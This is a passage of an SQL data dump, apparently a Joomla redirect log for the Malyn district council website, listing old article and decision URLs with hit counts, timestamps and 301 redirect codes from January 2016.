00:00:00',301),(23684,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=412:------165------&Itemid=70&lang=uk&option=com_content&view=article','','','',2,0,'2016-01-01 11:55:37','0000-00-00 00:00:00',301),(23685,'http://www.malyn-rayrada.org.ua/index.php?catid=29:--15122010-&id=197:-----l-r--2004-2010-&Itemid=60&lang=uk&option=com_content&view=article','','','',1,0,'2016-01-01 11:55:50','0000-00-00 00:00:00',301),(23686,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1100:2013-10-02-18-03-10&Itemid=0&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-01 11:56:03','0000-00-00 00:00:00',301),(23687,'http://www.malyn-rayrada.org.ua/index.php?catid=45:--14112012-&id=819:2012-11-14-16-40-09&Itemid=84&lang=ru&option=com_content&view=article','','','',2,0,'2016-01-01 11:56:09','0000-00-00 00:00:00',301),(23688,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=619:-11-6-&lang=en&option=com_content&view=article','','','',6,0,'2016-01-01 11:56:31','0000-00-00 00:00:00',301),(23689,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=922:2013-02-11-10-53-17&Itemid=14&lang=ru&option=com_content&view=article','','','',2,0,'2016-01-01 11:56:35','0000-00-00 00:00:00',301),(23690,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=998:1&lang=en&option=com_content&view=article','','','',1,0,'2016-01-01 11:56:48','0000-00-00 00:00:00',301),(23691,'http://www.malyn-rayrada.org.ua/index.php?catid=51&id=1019:2013-06-06-11-26-38&Itemid=92&lang=ru&option=com_content&view=article','','','',2,0,'2016-01-01 11:57:01','0000-00-00 00:00:00',301),(23692,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1132:2013-11-13-10-02-24&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-01 11:57:08','0000-00-00 00:00:00',301),(23693,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=954:-19-6-&Itemid=0&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-01 11:57:11','0000-00-00 00:00:00',301),(23694,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=1114:---------------lr---&Itemid=70&lang=en&option=com_content&view=article','','','',1,0,'2016-01-01 11:57:48','0000-00-00 00:00:00',301),(23695,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=1081:-2013-2017-&Itemid=70&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-01 11:58:06','0000-00-00 00:00:00',301),(23696,'http://www.malyn-rayrada.org.ua/index.php?catid=33:-20052011&id=329:2011-05-20-16-25-10&Itemid=66&lang=en&option=com_content&view=article','','','',2,0,'2016-01-01 11:58:21','0000-00-00 00:00:00',301),(23697,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1094:2013-09-24-05-02-52&Itemid=14&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-01 11:58:24','0000-00-00 00:00:00',301),(23698,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=869:2012-12-16-16-05-45&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-01 11:58:31','0000-00-00 00:00:00',301),(23699,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=995:-2012-&Itemid=14&lang=uk&option=com_content&view=article','','','',2,0,'2016-01-01 11:58:35','0000-00-00 00:00:00',301),(23700,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=870:2012-12-17-07-02-51&Itemid=&lang=uk&option=com_content&view=article','','','',1,0,'2016-01-01 11:58:45','0000-00-00 00:00:00',301),(23701,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=1269:----3110&Itemid=70&lang=uk&option=com_content&view=article','','','',1,0,'2016-01-01 11:58:48','0000-00-00 00:00:00',301),(23702,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1292:-i-&Itemid=14&lang=uk&option=com_content&view=article','','','',1,0,'2016-01-01 11:58:51','0000-00-00 00:00:00',301),(23703,'http://www.malyn-rayrada.org.ua/index.php?catid=43:--25072012-&id=705:-l-r&Itemid=82&lang=en&option=com_content&view=article','','','',1,0,'2016-01-01 11:58:56','0000-00-00 00:00:00',301),(23704,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=1277:-2014-&Itemid=70&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-01 12:00:57','0000-00-00 00:00:00',301),(23705,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1011:2013-05-29-09-51-28&Itemid=14&lang=uk&option=com_content&view=article','','','',1,0,'2016-01-01 12:01:18','0000-00-00 00:00:00',301),(23706,'http://www.malyn-rayrada.org.ua/index.php?catid=40:--28032012-&id=587:2012-02-27-13-44-05&Itemid=77&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-01 12:13:45','0000-00-00 00:00:00',301),(23707,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1156:2013-12-09-07-12-03&Itemid=&lang=uk&option=com_content&view=article','','','',2,0,'2016-01-01 12:14:03','0000-00-00 00:00:00',301),(23708,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1132:2013-11-13-10-02-24&Itemid=14&lang=uk&option=com_content&view=article','','','',1,0,'2016-01-01 12:15:31','0000-00-00 00:00:00',301),(23709,'http://www.malyn-rayrada.org.ua/index.php?id=49:--12042013-&Itemid=88&lang=ru&layout=blog&limitstart=5&option=com_content&view=category','','','',1,0,'2016-01-01 12:16:02','0000-00-00 00:00:00',301),(23710,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=744:2012-07-28-09-50-03&Itemid=0&lang=en&option=com_content&view=article','','','',1,0,'2016-01-01 12:16:46','0000-00-00 00:00:00',301),(23711,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1145:2013-11-27-09-47-11&Itemid=0&lang=en&option=com_content&view=article','','','',1,0,'2016-01-01 12:17:01','0000-00-00 00:00:00',301),(23712,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1121:-24-6-&Itemid=14&lang=uk&option=com_content&view=article','','','',1,0,'2016-01-01 12:17:29','0000-00-00 00:00:00',301),(23713,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=1186:-------2013--------i--2014--&Itemid=70&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-01 12:18:16','0000-00-00 00:00:00',301),(23714,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=777:2012-10-02-10-06-36&Itemid=70&lang=en&option=com_content&view=article','','','',2,0,'2016-01-01 12:19:04','0000-00-00 00:00:00',301),(23715,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1115:-24-&Itemid=14&lang=ru&option=com_content&view=article','','','',2,0,'2016-01-01 12:19:32','0000-00-00 00:00:00',301),(23716,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=869:2012-12-16-16-05-45&Itemid=&lang=uk&option=com_content&view=article','','','',1,0,'2016-01-01 12:19:48','0000-00-00 00:00:00',301),(23717,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=1191:------2014-&Itemid=70&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-01 12:20:03','0000-00-00 00:00:00',301),(23718,'http://www.malyn-rayrada.org.ua/index.php?catid=37&id=440:2011-10-21-16-24-47&Itemid=72&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-01 12:20:29','0000-00-00 00:00:00',301),(23719,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=802:-i-i-i-i-i&Itemid=14&lang=ru&option=com_content&view=article','','','',2,0,'2016-01-01 12:20:36','0000-00-00 00:00:00',301),(23720,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=596:2012-02-28-12-59-05&Itemid=70&lang=en&option=com_content&view=article','','','',1,0,'2016-01-01 12:20:45','0000-00-00 00:00:00',301),(23721,'http://www.malyn-rayrada.org.ua/index.php?id=33&Itemid=66&lang=ru&layout=blog&limitstart=20&option=com_content&view=category','','','',1,0,'2016-01-01 12:20:52','0000-00-00 00:00:00',301),(23722,'http://www.malyn-rayrada.org.ua/index.php?id=49&Itemid=88&lang=en&layout=blog&option=com_content&view=category','','','',1,0,'2016-01-01 12:21:07','0000-00-00 00:00:00',301),(23723,'http://www.malyn-rayrada.org.ua/index.php?catid=35&id=359:2011-06-30-11-10-42&Itemid=69&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-01 12:21:14','0000-00-00 00:00:00',301),(23724,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=669:-2011-56-&Itemid=14&lang=uk&option=com_content&view=article','','','',1,0,'2016-01-01 12:21:22','0000-00-00 00:00:00',301),(23725,'http://www.malyn-rayrada.org.ua/index.php?catid=53&id=1087:-12-2013-398-l-2013-r-19-2013-416-l-2013-r&Itemid=94&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-01 12:21:28','0000-00-00 00:00:00',301),(23726,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=997:-27-&Itemid=&lang=en&option=com_content&view=article','','','',1,0,'2016-01-01 12:21:43','0000-00-00 00:00:00',301),(23727,'http://www.malyn-rayrada.org.ua/index.php?catid=53:--25102013-&id=1088:2013-09-19-12-06-07&Itemid=94&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-01 12:21:51','0000-00-00 00:00:00',301),(23728,'http://www.malyn-rayrada.org.ua/index.php?catid=29&id=204:2010-12-15-14-13-07&Itemid=60&lang=en&option=com_content&view=article','','','',1,0,'2016-01-01 12:22:19','0000-00-00 00:00:00',301),(23729,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1049:2013-07-15-05-50-46&Itemid=14&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-01 12:22:29','0000-00-00 00:00:00',301),(23730,'http://www.malyn-rayrada.org.ua/index.php?catid=40&id=589:2012-02-27-13-52-30&Itemid=77&lang=en&option=com_content&view=article','','','',1,0,'2016-01-01 12:22:45','0000-00-00 00:00:00',301),(23731,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1282:-30-6-&Itemid=&lang=uk&option=com_content&view=article','','','',2,0,'2016-01-01 12:22:50','0000-00-00 00:00:00',301),(23732,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1110:-9-2013-&Itemid=&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-01 12:22:54','0000-00-00 00:00:00',301),(23733,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=1082:------------2012-2015-&Itemid=70&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-01 12:22:58','0000-00-00 00:00:00',301),(23734,'http://www.malyn-rayrada.org.ua/index.php?id=56&Itemid=97&lang=ru&layout=blog&limitstart=10&option=com_content&view=category','','','',1,0,'2016-01-01 12:23:27','0000-00-00 00:00:00',301),(23735,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo','','','',21,0,'2016-01-01 12:44:12','0000-00-00 00:00:00',301),(23736,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1279:2014-04-13-11-36-46&Itemid=&lang=en&option=com_content&view=article','','','',2,0,'2016-01-01 13:11:17','0000-00-00 00:00:00',301),(23737,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1254:-1-50&Itemid=14&lang=uk&option=com_content&view=article','','','',1,0,'2016-01-01 13:20:39','0000-00-00 00:00:00',301),(23738,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/58-rishennja-radi/rishennja/--19122011-','','','',12,0,'2016-01-01 13:38:03','0000-00-00 00:00:00',301),(23739,'http://malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/1131-granitnenska-selishchna-rada-informue','','','',2,0,'2016-01-01 13:38:04','0000-00-00 00:00:00',301),(23740,'http://malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/1140-starovorob-jivska-silska-rada-informue','','','',2,0,'2016-01-01 13:38:06','0000-00-00 00:00:00',301),(23741,'http://malyn-rayrada.org.ua/index.php/686-zustrichaemo-novij-2014-rik-rik-sinogo-derev','','','',2,0,'2016-01-01 13:38:09','0000-00-00 00:00:00',301),(23742,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/929-pro-znyattya-z-kontrolyu-rishen-rajonnoji-radi','','','',3,0,'2016-01-01 13:38:44','0000-00-00 00:00:00',301),(23743,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-20052011/136-pro-zatverdzhennja-rajonnoi-programi-rozvitku?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-01-01 13:39:21','0000-00-00 00:00:00',301),(23744,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-20052011/137-pro-utvorennja-cilovogo-fondu-socialno','','','',3,0,'2016-01-01 13:39:23','0000-00-00 00:00:00',301),(23745,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-20052011/137-pro-utvorennja-cilovogo-fondu-socialno?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-01-01 13:39:24','0000-00-00 00:00:00',301),(23746,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-20052011/138-pro-rezervuvannja-zemel?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-01-01 13:39:27','0000-00-00 00:00:00',301),(23747,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-20052011/157-pro-hid-vikonannja-rajonnoi-kompleksnoi-programi_3','','','',3,0,'2016-01-01 13:39:29','0000-00-00 00:00:00',301),(23748,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-20052011/157-pro-hid-vikonannja-rajonnoi-kompleksnoi-programi_3?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-01-01 13:39:30','0000-00-00 00:00:00',301),(23749,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-20052011/158-pro-hid-vikonannja-rajonnoi-programi-rozvitku_3','','','',3,0,'2016-01-01 13:39:31','0000-00-00 00:00:00',301),(23750,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-20052011/158-pro-hid-vikonannja-rajonnoi-programi-rozvitku_3?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-01-01 13:39:33','0000-00-00 00:00:00',301),(23751,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-20052011/159-pro-hid-vikonannja-rajonnoi-programi-rozvitku_4','','','',3,0,'2016-01-01 13:39:34','0000-00-00 00:00:00',301),(23752,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-20052011/159-pro-hid-vikonannja-rajonnoi-programi-rozvitku_4?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-01-01 13:39:36','0000-00-00 00:00:00',301),(23753,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-20052011/169-pro-hid-vikonannja-rajonnoi-programi-reformuvannja','','','',3,0,'2016-01-01 13:39:37','0000-00-00 00:00:00',301),(23754,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-20052011/169-pro-hid-vikonannja-rajonnoi-programi-reformuvannja?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-01-01 13:39:38','0000-00-00 00:00:00',301),(23755,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-20052011/170-pro-zatverdzhennja-rajonnoi-programi-provedennja-u','','','',3,0,'2016-01-01 13:39:40','0000-00-00 00:00:00',301),(23756,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-20052011/170-pro-zatverdzhennja-rajonnoi-programi-provedennja-u?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-01-01 13:39:41','0000-00-00 00:00:00',301),(23757,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-20052011/172-pro-vnesennja-dopovnen-do-rajonnoi-programi-shhodo','','','',3,0,'2016-01-01 13:39:43','0000-00-00 00:00:00',301),(23758,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-20052011/172-pro-vnesennja-dopovnen-do-rajonnoi-programi-shhodo?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-01-01 13:39:44','0000-00-00 00:00:00',301),(23759,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-20052011/173-pro-hid-vikonannja-rajonnoi-programi-prizovna','','','',3,0,'2016-01-01 13:39:46','0000-00-00 00:00:00',301),(23760,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-20052011/173-pro-hid-vikonannja-rajonnoi-programi-prizovna?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-01-01 13:39:47','0000-00-00 00:00:00',301),(23761,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-20052011/174-pro-edinij-den-deputata','','','',3,0,'2016-01-01 13:39:48','0000-00-00 00:00:00',301),(23762,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-20052011/174-pro-edinij-den-deputata?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-01-01 13:39:50','0000-00-00 00:00:00',301),(23763,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-20052011/175-pro-zatverdzhennja-rozporjadzhen-golovi-rajonnoi_5?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-01-01 13:39:52','0000-00-00 00:00:00',301),(23764,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-17-09-2014/859-pro-vnesennya-zmin-do-rajonnogo-byudzhetu-na-2014-rik?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-01-01 13:40:07','0000-00-00 00:00:00',301),(23765,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-20-05-2015-roku/1090-pro-zatverdzhennya-rozporyadzhen-golovi-rajonnoji-radi?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-01-01 13:40:12','0000-00-00 00:00:00',301),(23766,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-20-05-2015-roku?limitstart=0','','','',3,0,'2016-01-01 13:40:14','0000-00-00 00:00:00',301),(23767,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-27-03-2015-roku/1001-pro-programu-sotsialno-ekonomichnogo-rozvitku-malinskogo-rajonu-na-2015-rik','','','',3,0,'2016-01-01 13:40:22','0000-00-00 00:00:00',301),(23768,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-27-03-2015-roku/1001-pro-programu-sotsialno-ekonomichnogo-rozvitku-malinskogo-rajonu-na-2015-rik?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-01-01 13:40:23','0000-00-00 00:00:00',301),(23769,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-27-03-2015-roku/1012-pro-zatverdzhennya-tekhnichnoji-dokumentatsiji-po-viznachennyu-normativnoji-groshovoji-otsinki-zemelnoji-dilyanki','','','',3,0,'2016-01-01 13:40:25','0000-00-00 00:00:00',301),(23770,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-27-03-2015-roku/1012-pro-zatverdzhennya-tekhnichnoji-dokumentatsiji-po-viznachennyu-normativnoji-groshovoji-otsinki-zemelnoji-dilyanki?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-01-01 13:40:26','0000-00-00 00:00:00',301),(23771,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-27-03-2015-roku/1020-pro-zatverdzhennya-spisku-prisyazhnikh-malinskogo-rajonnogo-sudu?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-01-01 13:40:29','0000-00-00 00:00:00',301),(23772,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-27-03-2015-roku/1024-pro-znyattya-z-kontrolyu-rishen-rajonnoji-radi?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-01-01 13:40:33','0000-00-00 00:00:00',301),(23773,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-27-03-2015-roku/1045-pro-zatverdzhennya-statutu-redaktsiji-gazeti-malinski-novini-v-novij-redaktsiji','','','',3,0,'2016-01-01 13:40:35','0000-00-00 00:00:00',301),(23774,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-27-03-2015-roku/1045-pro-zatverdzhennya-statutu-redaktsiji-gazeti-malinski-novini-v-novij-redaktsiji?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-01-01 13:40:36','0000-00-00 00:00:00',301),(23775,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-27-03-2015-roku/1046-pro-nadannya-primishchennya-ta-zvilnennya-vid-plati-za-koristuvannya-komunalnimi-poslugami-radi-malinskoji-rajonnoji-organizatsiji-veteraniv','','','',3,0,'2016-01-01 13:40:38','0000-00-00 00:00:00',301),(23776,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-27-03-2015-roku/1047-pro-zatverdzhennya-tekhnichnoji-dokumentatsiji-pro-normativnu-groshovu-otsinku-zemelnoji-dilyanki-shcho-peredaetsya-v-orendu-gr-shtulyu-valeriyu-grigorovichu','','','',3,0,'2016-01-01 13:40:39','0000-00-00 00:00:00',301),(23777,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-27-03-2015-roku/1048-pro-zatverdzhennya-rozporyadzhen-golovi-rajonnoji-radi','','','',3,0,'2016-01-01 13:40:40','0000-00-00 00:00:00',301),(23778,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-27-03-2015-roku/1048-pro-zatverdzhennya-rozporyadzhen-golovi-rajonnoji-radi?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-01-01 13:40:42','0000-00-00 00:00:00',301),(23779,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-27-03-2015-roku/1049-pro-zatverdzhennya-redaktora-gazeti-malinski-novini','','','',3,0,'2016-01-01 13:40:43','0000-00-00 00:00:00',301),(23780,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-27-03-2015-roku/1049-pro-zatverdzhennya-redaktora-gazeti-malinski-novini?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-01-01 13:40:45','0000-00-00 00:00:00',301),(23781,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-27-03-2015-roku?limitstart=0','','','',3,0,'2016-01-01 13:40:46','0000-00-00 00:00:00',301),(23782,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=507:2011-12-19-17-10-52&lang=en&option=com_content&view=article','','','',1,0,'2016-01-01 13:54:18','0000-00-00 00:00:00',301),(23783,'http://www.malyn-rayrada.org.ua/index.php?catid=38:--19122011-&id=490:2011-12-02-09-02-47&Itemid=73&lang=en&option=com_content&view=article','','','',1,0,'2016-01-01 14:00:01','0000-00-00 00:00:00',301),(23784,'http://www.malyn-rayrada.org.ua/index.php?catid=38&id=490:2011-12-02-09-02-47&Itemid=73&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-01 14:06:43','0000-00-00 00:00:00',301),(23785,'http://www.malyn-rayrada.org.ua/index.php?catid=40&id=594:-lr-&Itemid=77&lang=en&option=com_content&view=article','','','',1,0,'2016-01-01 14:14:24','0000-00-00 00:00:00',301),(23786,'http://www.malyn-rayrada.org.ua/index.php?catid=47:-21022013-&id=875:-2013-&Itemid=86&lang=en&option=com_content&view=article','','','',1,0,'2016-01-01 14:42:32','0000-00-00 00:00:00',301),(23787,'http://www.malyn-rayrada.org.ua/index.php?catid=42&id=635:-2011-2015-&Itemid=80&lang=uk&option=com_content&view=article','','','',1,0,'2016-01-01 14:45:07','0000-00-00 00:00:00',301),(23788,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=763:2012-09-24-07-57-43&Itemid=14&lang=uk&option=com_content&view=article','','','',2,0,'2016-01-01 14:45:17','0000-00-00 00:00:00',301),(23789,'http://www.malyn-rayrada.org.ua/index.php?catid=39&id=543:2012-01-26-11-58-53&Itemid=76&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-01 14:51:00','0000-00-00 00:00:00',301),(23790,'http://www.malyn-rayrada.org.ua/index.php?catid=4&id=4:-1062010&Itemid=8&lang=en&option=com_content&view=article','','','',1,0,'2016-01-01 14:53:12','0000-00-00 00:00:00',301),(23791,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=42&Itemid=80&lang=uk&limitstart=10','','','',1,0,'2016-01-01 15:29:01','0000-00-00 00:00:00',301),(23792,'http://www.malyn-rayrada.org.ua/index.php?catid=47&id=914:2013-01-23-13-21-28&Itemid=86&lang=uk&option=com_content&view=article','','','',1,0,'2016-01-01 15:41:36','0000-00-00 00:00:00',301),(23793,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=767:2012-10-01-08-20-30&lang=en&option=com_content&view=article','','','',1,0,'2016-01-01 15:42:03','0000-00-00 00:00:00',301),(23794,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=681:16-13-&Itemid=0&lang=uk&option=com_content&view=article','','','',1,0,'2016-01-01 15:42:06','0000-00-00 00:00:00',301),(23795,'http://www.malyn-rayrada.org.ua/index.php?id=33&Itemid=66&lang=uk&layout=blog&limitstart=20&option=com_content&view=category','','','',1,0,'2016-01-01 16:52:17','0000-00-00 00:00:00',301),(23796,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15122010-/107-pro-hid-vikonannja-kompleksnoi-programi-zerno','','','',5,0,'2016-01-01 16:54:41','0000-00-00 00:00:00',301),(23797,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=1092:2013-09-19-12-18-37&Itemid=70&lang=uk&option=com_content&view=article','','','',1,0,'2016-01-01 18:02:43','0000-00-00 00:00:00',301),(23798,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=483:-2012-2016-&catid=38:--19122011-&Itemid=73&lang=ru','','','',1,0,'2016-01-02 00:22:07','0000-00-00 00:00:00',301),(23799,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=632:-2011-2015-&catid=42&Itemid=80&lang=uk','','','',3,0,'2016-01-02 00:33:15','0000-00-00 00:00:00',301),(23800,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=463:-2007-2015-&catid=38:--19122011-&Itemid=73&lang=ru','','','',3,0,'2016-01-02 06:10:03','0000-00-00 00:00:00',301),(23801,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=56&layout=blog&Itemid=97&lang=ru','','','',1,0,'2016-01-02 06:46:35','0000-00-00 00:00:00',301),(23802,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=231:2011-01-06-08-26-07&catid=11&lang=uk&Itemid=','','','',3,0,'2016-01-02 07:30:35','0000-00-00 00:00:00',301),(23804,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=688:2012-05-25-16-34-51&Itemid=&lang=en&option=com_content&view=article','','','',1,0,'2016-01-02 21:05:22','0000-00-00 00:00:00',301),(23805,'http://www.malyn-rayrada.org.ua/index.php?catid=15&id=862:-qq&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-02 21:10:44','0000-00-00 00:00:00',301),(23806,'http://www.malyn-rayrada.org.ua/index.php?catid=37&id=418:2011-09-29-08-40-03&Itemid=72&lang=ru&option=com_content&view=article','','','',1,0,'2016-01-02 21:13:06','0000-00-00 00:00:00',301),(23807,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1010:-22-6-&Itemid=14&lang=uk&option=com_content&view=article','','','',1,0,'2016-01-02 21:14:34','0000-00-00 00:00:00',301),(23808,'http://www.malyn-rayrada.org.ua/index.php?catid=42&id=632:-2011-2015-&Itemid=80&lang=uk&option=com_content&view=article','','','',1,0,'2016-01-02 21:14:41','0000-00-00 00:00:00',301),(23809,'http://malyn-rayrada.org.ua/index.php/1212-viddil-statistiki-u-malinskomu-rajoni-informue?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-01-02 21:17:04','0000-00-00 00:00:00',301),(23810,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-22-17-49-27/pochesni-gromadyani-rajonu-1-1','','','',10,0,'2016-01-02 21:17:32','0000-00-00 00:00:00',301),(23811,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-22-17-49-27/pochesni-gromadyani-rajonu-2-2','','','',10,0,'2016-01-02 21:17:44','0000-00-00 00:00:00',301),(23812,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-22-17-50-18/den-samovriaduv2013-011-133','','','',10,0,'2016-01-02 21:17:52','0000-00-00 00:00:00',301),(23813,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-22-17-50-18/hor-2011-138','','','',10,0,'2016-01-02 21:18:04','0000-00-00 00:00:00',301),(23814,'http://malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-23-06-08-04/img-0837-4-97','','','',10,0,'2016-01-02 21:18:11','0000-00-00 